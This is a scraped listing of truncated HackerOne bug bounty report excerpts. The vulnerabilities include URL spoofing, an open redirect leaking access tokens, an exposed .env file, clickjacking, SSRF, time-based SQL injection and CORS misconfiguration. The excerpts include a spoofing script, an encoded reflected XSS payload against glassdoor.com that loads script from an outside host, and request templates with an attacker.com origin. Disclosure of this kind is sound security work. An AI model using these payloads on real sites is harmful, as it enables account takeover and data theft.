HackerOne Reports

## Summary: It's possible to open links pointing to `file:///` origin from web pages using "Open link in a new tab" in context menu. > https://hackerone.com/bugs?report_id=369185 shows unsafe `ssh://` protocol handling, which leads to information leak using ssh(OS username and etc.). The vulnerability is highly available, so it's possible to …

## Summary: URL spoofing vulnerability. ## Repro ``` <script> window.onclick = function () { x = window.open('https://www.google.com/csi'); setTimeout(function () { x.document.write(`I am not a www.google.com;<button onclick="alert('I can run JS on this page!')">click me</button>`) }, 100); } </script> ``` URL in address bar is `https://www.google.com/csi`, but actually that's about:blank page. Attacker …

Nextcloud doesn't have a header settings for X-Content-Type Options which means it is vulnerable to MIME sniffing. The only defined value, "nosniff", prevents Internet Explorer and Google Chrome from MIME-sniffing a response away from the declared content-type. This also applies to Google Chrome when downloading extensions. This reduces exposure to …

# Description Missing input validation of host names returned by Domain Name Servers in node's `dns` library can lead to output of wrong hostnames (leading to Domain Hijacking) and injection vulnerabilities in applications using the library (leading to Remote Code Execution, XSS, Applications crashes, etc.). # Discoverer(s)/Credits Philipp Jeitner, Fraunhofer …

## Summary: Hi Logitech team, on streamlabs.com the endpoint: `streamlabs.com/global/identity?popup=1&r=protocol://merch.streamlabs.com` redirect any authenticated user to a arbitrary protocol, and it merge the redirect link with an access_token. {F1281409} this means that if a malicious app that handle the protocol is installed on the device the access token will be steal …

Report Submission Form ## Summary: csi-snapshot-controller crashes when processing VolumeSnapshot with non-existing PVC ## Kubernetes Version: 1.19 ## Component Version: snapshot-controller from external-snapshotter repo ver 3.0.0 https://github.com/kubernetes-csi/external-snapshotter/releases/tag/v3.0.0 ## Steps To Reproduce: 1. Install Kubernetes 1.19 with snapshot-controller v3.0.0 1. Create VolumeSnapshot object with empty spec.volumeSnapshotClass and spec.source.persistentVolumeClaimName = <non-existing PVC …

A .env file was discovered on the server at ████, exposing sensitive application configurations, including database credentials, email settings, and more. This information could allow an attacker to gain unauthorized access to critical systems and services. **Steps to Reproduce:** 1. Open a web browser. 2. Navigate to ████████. 3. The …

##SUMMARY: Few Important function of yelp.com are vulnerable to ClickJacking Attack. ##DESCRIPTION: Please have an Introduction about the vulnerability Type: https://en.wikipedia.org/wiki/Clickjacking ClikcJacking is similar to CSRF with just an extra involvement of the victim to click somewhere on the ClickJacked page (which is usually done very easily). It bypasses CSRF …

## Description ----- The inconsistent of URL parsing and URL fetching are distinct ## Original bug report ----- - https://bugs.python.org/issue30500 - http://python-security.readthedocs.io/vuln/bpo-30500_urllib_connects_to_a_wrong_host.html ## Note ----- - None Thanks :) ## Impact SSRF

**Description:** The following param allows an attacker to trick people into downloading malicious files, scripts and other payloads. https://██████████?url=https://<MaliciousURL> PoC 1. I will show you how the page looks normally without any changes. If you directly access https://███ you will be shown the following page. You can click on 'Click …

The endpoint https://www.glassdoor.com/Interview/Accenturme-Interview-Questions-E9931.htm is vulnerable to reflected XSS. Affected Parameter: filter.jobTitleFTS Browsers tested: Chrome, Firefox Payload: %3c%3c%3ca%3ea%3escript%20SrC%3d%22%68%74%74%70s%3a%2f%2f%73%6b%69%6e%6e%79%2d%66%65%61%72%2e%73%75%72%67%65%2e%73%68%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%3c%3ca%3ea%3e%2fscript%3e Decoded: <<<a>a>script SrC="https://skinny-fear.surge.sh/payload.js"><<<a>a>/script> Steps To Reproduce: 1. Navigate to https://www.glassdoor.com/Interview/Accenture-Interview-Questions-E4138.htm?filter.jobTitleFTS=Business%20Analyst 2. Add a parameter countryRedirect=True 3. Because of this parameter the browser does not get redirected to another page when we enter payload. …

### Summary *pip* is probably the most popular *Python* package manager and can be used to install packages from the publicly available *Python Package Index* (*PyPi*) at [pypi.org](https://pypi.org) or form internal package repositories. In the beginning of 2021, a vulnerability type called *Dependency Confusion* attracted some attention in the information …

Hi the ████ was vulnerable to time bassed injection via referer header #steps 1- copy the request to your burp suite : ```GET /DNCdb.php?alert= HTTP/1.1 Host: ███████ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close ████=* Upgrade-Insecure-Requests: 1 Referer: …

## Summary: Hello, The support section has a validation on all the posted messages where it doesn't allow you to edit your messages after some minutes from posting them. I was able to bypass this protection and edit successfully the previous messages that can't be edited. After further investigation, I …

The page located at `https://sal.██████.com/list/Activity/hour/all/0/` suffers from a Cross-site Scripting (XSS) vulnerability when a user has set their hostname on their machine to an XSS payload. ##### Vulnerable Page `https://sal.██████.com/list/Activity/hour/all/0/` ##### Victim IP Address `███████` ##### Referer `https://sal.██████.com/` ##### User Agent `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, …

Step-by-step Reproduction : Send this request: ``` GET /██████████ HTTP/1.1 Host: █████ Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close █████████ Origin: http://attacker.com ``` Receive : ``` HTTP/1.1 200 OK Cache-Control: max-age=0,must-revalidate Expires: Wed, 31 Dec 1969 16:00:00 PST Vary: Origin …